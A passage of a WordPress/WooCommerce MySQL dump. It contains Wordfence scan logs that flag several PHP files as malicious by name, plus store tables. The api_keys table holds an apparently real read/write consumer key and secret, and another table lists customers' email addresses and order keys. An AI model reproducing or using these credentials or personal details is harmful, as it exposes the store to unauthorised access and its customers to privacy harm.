scan.'),(22588,1566807881.993238,2,'info','Scanning comments with 2000 left to scan.'),(22589,1566807882.656721,2,'info','Scanning comments with 1000 left to scan.'),(22590,1566807883.279879,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blacklist'),(22591,1566807883.284834,10,'info','SUM_START:Scanning for weak passwords'),(22592,1566807883.286778,2,'info','Starting password strength check on 3 users.'),(22593,1566807883.303183,10,'info','SUM_ENDOK:Scanning for weak passwords'),(22594,1566807883.309216,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(22595,1566807891.145514,10,'info','SUM_ENDOK:Scanning for old themes, plugins and core files'),(22596,1566807891.150750,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(22597,1566807891.156397,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(22598,1566807891.161524,10,'info','SUM_START:Scanning for suspicious site options'),(22599,1566807891.169072,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(22600,1566807891.169463,2,'info','Done examining URLs'),(22601,1566807891.173429,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(22602,1566807891.178215,1,'info','-------------------'),(22603,1566807891.178621,2,'info','Wordfence used 20.84 MB of memory for scan. Server peak memory usage was: 103.34 MB'),(22604,1566807891.178857,1,'info','Scan Complete. Scanned 8575 files, 26 plugins, 5 themes, 69 posts, 3817 comments and 2972 URLs in 5 minutes 1 second.'),(22605,1566807891.179015,10,'info','SUM_FINAL:Scan complete. You have 25 new issues to fix. See below.'),(22936,1566903853.007358,2,'info','Scanned contents of 3170 additional files at 13.51 per second'),(22937,1566903855.609428,2,'info','Scanned contents of 3175 additional files at 13.38 per second'),(22938,1566903860.575964,2,'info','Scanned contents of 3178 additional files at 13.12 per second'),(22939,1566903861.310975,2,'info','Scanned contents of 3187 additional files at 13.12 per second'),(22940,1566903861.311465,2,'info','Asking Wordfence to check URLs against malware list.'),(22941,1566903861.352962,2,'info','Checking 3927 host keys against Wordfence scanning servers.'),(22942,1566903861.918844,2,'info','Done host key check.'),(22943,1566903861.930381,2,'info','Checking 14 URLs from 13 sources.'),(22944,1566903862.687811,2,'info','Done URL check.'),(22945,1566903863.078038,2,'info','Done file contents scan'),(22946,1566903863.079930,2,'info','Adding issue: File appears to be malicious: 91zf4lv7.php'),(22947,1566903863.081489,2,'info','Adding issue: File appears to be malicious: 980z5hai.php'),(22948,1566903863.082540,2,'info','Adding issue: File appears to be malicious: crw3tpxd.php'),(22949,1566903863.083695,2,'info','Adding issue: File appears to be malicious: index.php'),(22950,1566903863.085699,2,'info','Adding issue: File appears to be malicious: iw0ugau6.php'),(22951,1566903863.087614,2,'info','Adding issue: File appears to be malicious: krccjsge.php'),(22952,1566903863.089115,2,'info','Adding issue: File appears to be malicious: loud7zhz.php'),(22953,1566903863.091930,2,'info','Adding issue: File appears to be malicious: wp-admin/network/pubrhlwr.php'),(22954,1566903863.093471,2,'info','Adding issue: File appears to be malicious: wp-content/plugins/index.php'),(22955,1566903863.094947,2,'info','Adding issue: File appears to be malicious: wp-content/plugins/lxvmqzku.php'),(22956,1566903863.096402,2,'info','Adding issue: File appears to be malicious: wp-content/plugins/woocommerce/woocommerce.php'),(22957,1566903863.101562,2,'info','Adding issue: File appears to be malicious: wp-content/themes/twentyseventeen/inc/emflcxnb.php'),(22958,1566903863.103098,2,'info','Adding issue: File appears to be malicious: wp-includes/Requests/Exception/HTTP/406.php'),(22959,1566903863.104559,2,'info','Adding issue: File appears to be malicious: wp-includes/Requests/Exception/HTTP/505.php'),(22960,1566903863.105915,2,'info','Adding issue: File appears to be malicious: wp-includes/images/wlw/hgzuguxf.php'),(22961,1566903863.107306,2,'info','Adding issue: File appears to be malicious: wp-includes/sodium_compat/namespaced/Core/lvxrrksb.php'),(22962,1566903863.108686,2,'info','Adding issue: File appears to be malicious: wp-settings.php'),(22963,1566903863.110099,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(22964,1566903863.114592,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blacklist'),(22965,1566903863.121797,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(22966,1566903863.124532,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(22967,1566903863.131292,10,'info','SUM_START:Scanning posts for URLs on a domain blacklist'),(22968,1566903863.225880,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(22969,1566903863.226703,2,'info','Checking 50 host keys against Wordfence scanning servers.'),(22970,1566903863.539021,2,'info','Done host key check.'),(22971,1566903863.539634,2,'info','Done examining URLs'),(22972,1566903863.551536,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blacklist'),(22973,1566903863.560088,10,'info','SUM_START:Scanning comments for URLs on a domain blacklist'),(22974,1566903864.548882,2,'info','Scanning comments with 3000 left to scan.'),(22975,1566903865.788829,2,'info','Scanning comments with 2000 left to scan.'),(22976,1566903866.896716,2,'info','Scanning comments with 1000 left to scan.'),(22977,1566903867.877903,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blacklist'),(22978,1566903867.901890,10,'info','SUM_START:Scanning for weak passwords'),(22979,1566903867.906464,2,'info','Starting password strength check on 3 users.'),(22980,1566903867.939328,10,'info','SUM_ENDOK:Scanning for weak passwords'),(22981,1566903867.950377,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(22982,1566903878.770143,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(22983,1566903878.774875,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(22984,1566903878.779238,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(22985,1566903878.783648,10,'info','SUM_START:Scanning for suspicious site options'),(22986,1566903878.791429,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(22987,1566903878.791785,2,'info','Done examining URLs'),(22988,1566903878.795801,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(22989,1566903878.799371,1,'info','-------------------'),(22990,1566903878.799734,2,'info','Wordfence used 20.83 MB of memory for scan. Server peak memory usage was: 103.33 MB'),(22991,1566903878.799923,1,'info','Scan Complete. Scanned 8587 files, 26 plugins, 5 themes, 69 posts, 3820 comments and 2985 URLs in 5 minutes 33 seconds.'),(22992,1566903878.800065,10,'info','SUM_FINAL:Scan complete. You have 26 new issues to fix. See below.'),(22993,1566910417.323275,10,'info','SUM_PREP:Preparing a new scan.'),(22994,1566910417.336039,1,'info','Contacting Wordfence to initiate scan'),(22995,1566910417.825446,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(22996,1566910419.835465,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(22997,1566910421.838604,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blacklist is for paid members only'),(22998,1566910423.864015,10,'info','SUM_START:Checking for the most secure way to get IPs'),(22999,1566910423.868866,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(23000,1566910423.895688,10,'info','SUM_START:Scanning DNS for unauthorized changes'),(23001,1566910423.898582,2,'info','Starting DNS scan for companyregistration.online'),(23002,1566910423.964505,2,'info','Scanning DNS A record for companyregistration.online'),(23003,1566910423.976639,2,'info','Scanning DNS MX record for companyregistration.online'),(23004,1566910423.977824,10,'info','SUM_ENDOK:Scanning DNS for unauthorized changes'),(23005,1566910423.987179,10,'info','SUM_START:Scanning to check available disk space'),(23006,1566910423.990232,2,'info','Total disk space: 18.11 TB -- Free disk space: 1.15 TB'),(23007,1566910423.990579,2,'info','The disk has 1207751.36 MB available'),(23008,1566910423.990838,10,'info','SUM_ENDOK:Scanning to check available disk space'),(23009,1566910424.006426,10,'info','SUM_START:Checking Web Application Firewall status'),(23010,1566910424.009540,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23011,1566910424.019095,10,'info','SUM_START:Checking for future GeoIP support'),(23012,1566910424.021968,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(23013,1566910424.050481,2,'info','Getting plugin list from WordPress'),(23014,1566910424.217596,2,'info','Found 26 plugins'),(23015,1566910424.217891,2,'info','Getting theme list from WordPress'),(23016,1566910424.252818,2,'info','Found 5 themes'),(23017,1566910424.305520,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(23018,1566910425.303434,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(23019,1566910425.335624,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(23020,1566910425.340488,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(23021,1566910425.353107,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(23022,1566910425.390397,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(23023,1566910425.443869,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(23024,1566910425.449366,10,'info','SUM_DISABLED:Skipping theme scan'),(23025,1566910425.449974,10,'info','SUM_DISABLED:Skipping plugin scan'),(23026,1566910425.459725,10,'info','SUM_START:Scanning for known malware files'),(23027,1566910425.471641,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(23028,1566910425.698735,2,'info','500 files indexed'),(23029,1566910426.318478,2,'info','1000 files indexed'),(23030,1566910426.741159,2,'info','1500 files indexed'),(23031,1566910427.264531,2,'info','2000 files indexed'),(23032,1566910427.463972,2,'info','2500 files indexed'),(23033,1566910427.959964,2,'info','3000 files indexed'),(23034,1566910428.166796,2,'info','3500 files indexed'),(23035,1566910428.427524,2,'info','4000 files indexed'),(23036,1566910428.582022,2,'info','4500 files indexed'),(23037,1566910428.779785,2,'info','5000 files indexed'),(23038,1566910429.014388,2,'info','5500 files indexed'),(23039,1566910429.118052,2,'info','6000 files indexed'),(23040,1566910429.198472,2,'info','6500 files indexed'),(23041,1566910429.335905,2,'info','7000 files indexed'),(23042,1566910429.751487,2,'info','7500 files indexed'),(23043,1566910429.780471,2,'info','8000 files indexed'),(23044,1566910429.835809,2,'info','8474 files indexed'),(23045,1566910430.174932,2,'info','Analyzed 100 files containing 1.36 MB of data so far'),(23046,1566910430.487241,2,'info','Analyzed 200 files containing 2.5 MB of data so far'),(23047,1566910430.800379,2,'info','Analyzed 300 files containing 3.83 MB of data so far'),(23048,1566910431.240059,2,'info','Analyzed 400 files containing 6.27 MB of data so far'),(23049,1566910431.601382,2,'info','Analyzed 500 files containing 7.02 MB of data so far'),(23050,1566910432.123533,2,'info','Analyzed 600 files containing 7.95 MB of data so far'),(23051,1566910432.482009,2,'info','Analyzed 700 files containing 8.84 MB of data so far'),(23052,1566910432.766543,2,'info','Analyzed 800 files containing 9.66 MB of data so far'),(23053,1566910432.993710,2,'info','Analyzed 900 files containing 10.15 MB of data so far'),(23054,1566910436.194348,2,'info','Analyzed 1000 files containing 10.61 MB of data so far'),(23055,1566910436.530262,2,'info','Analyzed 1100 files containing 11.44 MB of data so far'),(23056,1566910436.881527,2,'info','Analyzed 1200 files containing 12.51 MB of data so far'),(23057,1566910437.082373,2,'info','Analyzed 1300 files containing 12.77 MB of data so far'),(23058,1566910437.372024,2,'info','Analyzed 1400 files containing 13.14 MB of data so far'),(23059,1566910437.662027,2,'info','Analyzed 1500 files containing 14.34 MB of data so far'),(23060,1566910437.958828,2,'info','Analyzed 1600 files containing 15.61 MB of data so far'),(23061,1566910438.242148,2,'info','Analyzed 1700 files containing 16.75 MB of data so far'),(23062,1566910438.589993,2,'info','Analyzed 1800 files containing 18.01 MB of data so far'),(23063,1566910438.796537,2,'info','Analyzed 1900 files containing 18.83 MB of data so far'),(23064,1566910439.008867,2,'info','Analyzed 2000 files containing 19.47 MB of data so far'),(23065,1566910439.293173,2,'info','Analyzed 2100 files containing 20.79 MB of data so far'),(23066,1566910439.586937,2,'info','Analyzed 2200 files containing 22.08 MB of data so far'),(23067,1566910440.194991,2,'info','Analyzed 2300 files containing 24.98 MB of data so far'),(23068,1566910440.536351,2,'info','Analyzed 2400 files containing 26.19 MB of data so far'),(23069,1566910440.861742,2,'info','Analyzed 2500 files containing 27.15 MB of data so far'),(23070,1566910441.095234,2,'info','Analyzed 2600 files containing 27.47 MB of data so far'),(23071,1566910442.001398,2,'info','Analyzed 2700 files containing 31.5 MB of data so far'),(23072,1566910442.920003,2,'info','Analyzed 2800 files containing 34.58 MB of data so far'),(23073,1566910443.622533,2,'info','Analyzed 2900 files containing 37.21 MB of data so far'),(23074,1566910443.849765,2,'info','Analyzed 3000 files containing 37.82 MB of data so far'),(23075,1566910444.384513,2,'info','Analyzed 3100 files containing 38.69 MB of data so far'),(23076,1566910444.628487,2,'info','Analyzed 3200 files containing 39 MB of data so far'),(23077,1566910444.804124,2,'info','Analyzed 3300 files containing 39.17 MB of data so far'),(23078,1566910445.028340,2,'info','Analyzed 3400 files containing 39.96 MB of data so far'),(23079,1566910445.727374,2,'info','Analyzed 3500 files containing 42.59 MB of data so far'),(23080,1566910445.923052,2,'info','Analyzed 3600 files containing 43.04 MB of data so far'),(23081,1566910446.335036,2,'info','Analyzed 3700 files containing 44.82 MB of data so far'),(23082,1566910446.520009,2,'info','Analyzed 3800 files containing 45.44 MB of data so far'),(23083,1566910446.660059,2,'info','Analyzed 3900 files containing 45.59 MB of data so far'),(23084,1566910446.885927,2,'info','Analyzed 4000 files containing 46.43 MB of data so far'),(23085,1566910447.285948,2,'info','Analyzed 4100 files containing 48.12 MB of data so far'),(23086,1566910447.761867,2,'info','Analyzed 4200 files containing 48.98 MB of data so far'),(23087,1566910448.349113,2,'info','Analyzed 4300 files containing 50.04 MB of data so far'),(23088,1566910448.792853,2,'info','Analyzed 4400 files containing 51.13 MB of data so far'),(23089,1566910449.167999,2,'info','Analyzed 4500 files containing 52.14 MB of data so far'),(23090,1566910449.439099,2,'info','Analyzed 4600 files containing 52.89 MB of data so far'),(23091,1566910449.877535,2,'info','Analyzed 4700 files containing 54.56 MB of data so far'),(23092,1566910450.071587,2,'info','Analyzed 4800 files containing 54.72 MB of data so far'),(23093,1566910450.383094,2,'info','Analyzed 4900 files containing 55.75 MB of data so far'),(23094,1566910450.544137,2,'info','Analyzed 5000 files containing 55.98 MB of data so far'),(23095,1566910450.691716,2,'info','Analyzed 5100 files containing 56.23 MB of data so far'),(23096,1566910455.951349,2,'info','Analyzed 5200 files containing 64.49 MB of data so far'),(23097,1566910456.252763,2,'info','Analyzed 5300 files containing 65.29 MB of data so far'),(23098,1566910456.654157,2,'info','Analyzed 5400 files containing 65.43 MB of data so far'),(23099,1566910457.481499,2,'info','Analyzed 5500 files containing 66.91 MB of data so far'),(23100,1566910458.234458,2,'info','Analyzed 5600 files containing 69.51 MB of data so far'),(23101,1566910458.554493,2,'info','Analyzed 5700 files containing 69.64 MB of data so far'),(23102,1566910463.273244,2,'info','Analyzed 5800 files containing 96.11 MB of data so far'),(23103,1566910463.593356,2,'info','Analyzed 5900 files containing 96.83 MB of data so far'),(23104,1566910464.041613,2,'info','Analyzed 6000 files containing 98.46 MB of data so far'),(23105,1566910465.018824,2,'info','Analyzed 6100 files containing 103.81 MB of data so far'),(23106,1566910465.258595,2,'info','Analyzed 6200 files containing 105.85 MB of data so far'),(23107,1566910465.452167,2,'info','Analyzed 6300 files containing 106.45 MB of data so far'),(23108,1566910465.753995,2,'info','Analyzed 6400 files containing 107.74 MB of data so far'),(23109,1566910466.060525,2,'info','Analyzed 6500 files containing 108.4 MB of data so far'),(23110,1566910466.576656,2,'info','Analyzed 6600 files containing 109.65 MB of data so far'),(23111,1566910467.431128,2,'info','Analyzed 6700 files containing 111.2 MB of data so far'),(23112,1566910467.901012,2,'info','Analyzed 6800 files containing 113.61 MB of data so far'),(23113,1566910468.994137,2,'info','Analyzed 6900 files containing 119.01 MB of data so far'),(23114,1566910469.439146,2,'info','Analyzed 7000 files containing 120.59 MB of data so far'),(23115,1566910469.784931,2,'info','Analyzed 7100 files containing 122.18 MB of data so far'),(23116,1566910470.189640,2,'info','Analyzed 7200 files containing 123.79 MB of data so far'),(23117,1566910473.441632,2,'info','Analyzed 7300 files containing 125.28 MB of data so far'),(23118,1566910474.156383,2,'info','Analyzed 7400 files containing 130.95 MB of data so far'),(23119,1566910474.647818,2,'info','Analyzed 7500 files containing 132.12 MB of data so far'),(23120,1566910474.998781,2,'info','Analyzed 7600 files containing 134.2 MB of data so far'),(23121,1566910475.408270,2,'info','Analyzed 7700 files containing 136.79 MB of data so far'),(23122,1566910475.779311,2,'info','Analyzed 7800 files containing 138.48 MB of data so far'),(23123,1566910476.192356,2,'info','Analyzed 7900 files containing 140.23 MB of data so far'),(23124,1566910478.076283,2,'info','Analyzed 8000 files containing 150.8 MB of data so far'),(23125,1566910478.529286,2,'info','Analyzed 8100 files containing 152.61 MB of data so far'),(23126,1566910479.000710,2,'info','Analyzed 8200 files containing 154.41 MB of data so far'),(23127,1566910479.792402,2,'info','Analyzed 8300 files containing 158.34 MB of data so far'),(23128,1566910480.113704,2,'info','Analyzed 8400 files containing 159.57 MB of data so far'),(23129,1566910480.459784,2,'info','Analyzed 8474 files containing 160.89 MB of data.'),(23130,1566910480.459997,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(23131,1566910480.462958,10,'info','SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),(23132,1566910480.465838,10,'info','SUM_ENDOK:Scanning for known malware files'),(23133,1566910480.472502,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(23134,1566910480.542720,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(23135,1566910480.549618,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(23136,1566910480.551664,10,'info','SUM_START:Scanning file contents for URLs on a domain blacklist'),(23137,1566910481.736743,2,'info','Starting scan of file contents'),(23138,1566910482.775594,2,'info','Scanned contents of 15 additional files at 14.46 per second'),(23139,1566910483.790725,2,'info','Scanned contents of 37 additional files at 18.03 per second'),(23140,1566910484.819125,2,'info','Scanned contents of 51 additional files at 16.56 per second'),(23141,1566910485.820935,2,'info','Scanned contents of 78 additional files at 19.11 per second'),(23142,1566910486.830654,2,'info','Scanned contents of 105 additional files at 20.62 per second'),(23143,1566910487.850199,2,'info','Scanned contents of 129 additional files at 21.11 per second'),(23144,1566910488.867296,2,'info','Scanned contents of 163 additional files at 22.86 per second'),(23145,1566910493.439366,2,'info','Scanned contents of 168 additional files at 14.36 per second'),(23146,1566910494.446679,2,'info','Scanned contents of 185 additional files at 14.56 per second'),(23147,1566910495.458577,2,'info','Scanned contents of 213 additional files at 15.52 per second'),(23148,1566910496.486384,2,'info','Scanned contents of 228 additional files at 15.46 per second'),(23149,1566910497.512720,2,'info','Scanned contents of 256 additional files at 16.23 per second'),(23150,1566910498.514650,2,'info','Scanned contents of 270 additional files at 16.09 per second'),(23151,1566910499.640935,2,'info','Scanned contents of 279 additional files at 15.58 per second'),(23152,1566910500.669379,2,'info','Scanned contents of 296 additional files at 15.64 per second'),(23153,1566910501.760733,2,'info','Scanned contents of 310 additional files at 15.48 per second'),(23154,1566910502.799190,2,'info','Scanned contents of 325 additional files at 15.43 per second'),(23155,1566910503.827324,2,'info','Scanned contents of 349 additional files at 15.80 per second'),(23156,1566910505.109444,2,'info','Scanned contents of 367 additional files at 15.70 per second'),(23157,1566910506.149010,2,'info','Scanned contents of 373 additional files at 15.28 per second'),(23158,1566910507.515038,2,'info','Scanned contents of 381 additional files at 14.78 per second'),(23159,1566910508.638313,2,'info','Scanned contents of 389 additional files at 14.46 per second');
/*!40000 ALTER TABLE `wpxb_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wftrafficrates`
--

DROP TABLE IF EXISTS `wpxb_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wftrafficrates`
--

LOCK TABLES `wpxb_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wpxb_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_api_keys`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_api_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_api_keys` (
  `key_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `description` varchar(200) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `permissions` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL,
  `consumer_key` char(64) COLLATE utf8mb4_unicode_ci NOT NULL,
  `consumer_secret` char(43) COLLATE utf8mb4_unicode_ci NOT NULL,
  `nonces` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `truncated_key` char(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  `last_access` datetime DEFAULT NULL,
  PRIMARY KEY (`key_id`),
  KEY `consumer_key` (`consumer_key`),
  KEY `consumer_secret` (`consumer_secret`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_api_keys`
--

LOCK TABLES `wpxb_woocommerce_api_keys` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_api_keys` DISABLE KEYS */;
INSERT INTO `wpxb_woocommerce_api_keys` VALUES (1,1,'ActiveCampaign - API Read/Write (created on 16th June 2017 at 14:36).','read_write','0e0b01eadfce504369c96f622798e0c4ccf1dbb882a29e7777c16c6ba0a1436b','cs_a8ae06c0962670e285fdf14b0e385ef933f85b95','a:37:{i:1510322687;s:40:\"0f5d69fdea47006856dbd5d685ac58902df54909\";i:1510322690;s:40:\"4a7888128925d6c1073d8cd4f65de20f002238c9\";i:1510322836;s:40:\"99fbcc51c1d0192da4cac61af6ea5dd58c8dc6dc\";i:1510322837;s:40:\"2da56a6c67be7cd2fe15972114c0ef733400c466\";i:1510322875;s:40:\"0923b6b4b7980873fd0caabaa08406781c8dedfe\";i:1510322877;s:40:\"c09f3f6b632154b1fe90a4c0258c5c1ec69499e3\";i:1510322939;s:40:\"b0e183946fc8bf1438bf0576802ed7c68b446f3c\";i:1510322941;s:40:\"97833e6e5d67fccfbe43193a13516816f242483b\";i:1510322973;s:40:\"c585e31a1222f234b0934760b8464e56f83a43b8\";i:1510322976;s:40:\"f5371dcee623de32d62e248016934ae2160b948e\";i:1510323097;s:40:\"f8e4ab77af9c13cbcbe22229f9532806a09b56c2\";i:1510323099;s:40:\"891e0eeeec166e800f20b28471016e02846468ba\";i:1510323133;s:40:\"7e8f82045c55519734962d1becde2457f645972b\";i:1510323136;s:40:\"7a01a674e70c94bcb03bd13f8348ebfa571d5cdf\";i:1510323194;s:40:\"a80d103a3a1e10031ca84e695b09baf3d3984b65\";i:1510323195;s:40:\"a49e560a0e327965e77c8cf32e4edc84ab383d76\";i:1510323224;s:40:\"c186fdde9fc7030c213991d61989ac19dd86ec10\";i:1510323226;s:40:\"4fedfb9885e61425d255d1a6555933163882ac1b\";i:1510323269;s:40:\"a6b2b6eee55934a28af646e4da7cb30a9d6e24ab\";i:1510323270;s:40:\"8254baf32b42d3bbce47bb3c2cf0ff8e4352dca7\";i:1510323295;s:40:\"4d41aa8805fc0dcc0424185cf5025b39279caeb1\";i:1510323297;s:40:\"e3161348d7233f2f6f807a45dee97c64b8859da3\";i:1510323398;s:40:\"01dc9ba12bf6b3901576452516f637dd54819d3f\";i:1510323401;s:40:\"3271dd539b07ea5cf536e5713087c904bb32a706\";i:1510323405;s:40:\"ba45798f95db580aa49fe15abaee3ab21407c548\";i:1510323410;s:40:\"345f186f5fb3ea24ac057db4b81674e89fb9db0a\";i:1510323416;s:40:\"7fefc799f8b3794ce9c8f1bf19bf687ab3894b79\";i:1510323422;s:40:\"311031276fe95da3c7bb9dc8891c6953d95f784f\";i:1510323424;s:40:\"859d6c26eeac34be96fe3c15f2655d4a3a7d94fc\";i:1510323460;s:40:\"e9ae049d35a5659ec40b713b2bbca86206a3e003\";i:1510323461;s:40:\"913553fa98686ae7d3f41e2c61b3e3b3197f8128\";i:1510323491;s:40:\"d9889876d1f5d1cf6e3a18f30a9bdd3a5da90298\";i:1510323493;s:40:\"59cf8ffd85e22a28406b8925a73fda34baf79df1\";i:1510323549;s:40:\"cff2d1f69ffcb8a85f23d5644c44d29ff6a2d1fc\";i:1510323551;s:40:\"d648510c343faab85a60cbc47887d8f9b55c1704\";i:1510323581;s:40:\"22801c13ec372e8f908ec5ee07f5c72c867f5fbf\";i:1510323584;s:40:\"d9066c5ab4ab042357bf30c62ecef6fc713760f2\";}','4a56ff5','2017-11-10 16:19:45');
/*!40000 ALTER TABLE `wpxb_woocommerce_api_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_attribute_taxonomies`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_attribute_taxonomies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_attribute_taxonomies` (
  `attribute_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `attribute_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribute_label` varchar(200) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `attribute_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribute_orderby` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribute_public` int(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`attribute_id`),
  KEY `attribute_name` (`attribute_name`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_attribute_taxonomies`
--

LOCK TABLES `wpxb_woocommerce_attribute_taxonomies` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_attribute_taxonomies` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_woocommerce_attribute_taxonomies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_downloadable_product_permissions`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_downloadable_product_permissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_downloadable_product_permissions` (
  `permission_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `download_id` varchar(36) COLLATE utf8mb4_unicode_ci NOT NULL,
  `product_id` bigint(20) unsigned NOT NULL,
  `order_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `order_key` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_email` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `downloads_remaining` varchar(9) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `access_granted` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access_expires` datetime DEFAULT NULL,
  `download_count` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`permission_id`),
  KEY `download_order_product` (`download_id`,`order_id`,`product_id`),
  KEY `download_order_key_product` (`product_id`,`order_id`,`order_key`(191),`download_id`),
  KEY `order_id` (`order_id`),
  KEY `user_order_remaining_expires` (`user_id`,`order_id`,`downloads_remaining`,`access_expires`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_downloadable_product_permissions`
--

LOCK TABLES `wpxb_woocommerce_downloadable_product_permissions` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_downloadable_product_permissions` DISABLE KEYS */;
INSERT INTO `wpxb_woocommerce_downloadable_product_permissions` VALUES (1,'d24217f9913a0df845597a7082a0f939',80,27916,'wc_order_5846546596b27','info@mawinc.co.za',1,'0','2017-06-18 00:00:00',NULL,2),(2,'d24217f9913a0df845597a7082a0f939',80,28896,'wc_order_5a05b1baed2e5','nazeer@digitalstrategies.biz',3,'1','2017-11-10 00:00:00',NULL,1),(3,'d24217f9913a0df845597a7082a0f939',80,29041,'wc_order_5ad59b4a7c7fd','nazeer@digitalstrategies.biz',3,'1','2018-04-17 00:00:00',NULL,1),(4,'d24217f9913a0df845597a7082a0f939',80,29108,'wc_order_5aef39d8175ea','imraanmaw@gmail.com',1,'0','2018-05-06 00:00:00',NULL,2),(5,'d24217f9913a0df845597a7082a0f939',80,32432,'wc_order_OQ7xqTMBW9rUl','imraanmaw@gmail.com',1,'1','2019-08-08 00:00:00',NULL,1);
/*!40000 ALTER TABLE `wpxb_woocommerce_downloadable_product_permissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_log`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_log` (
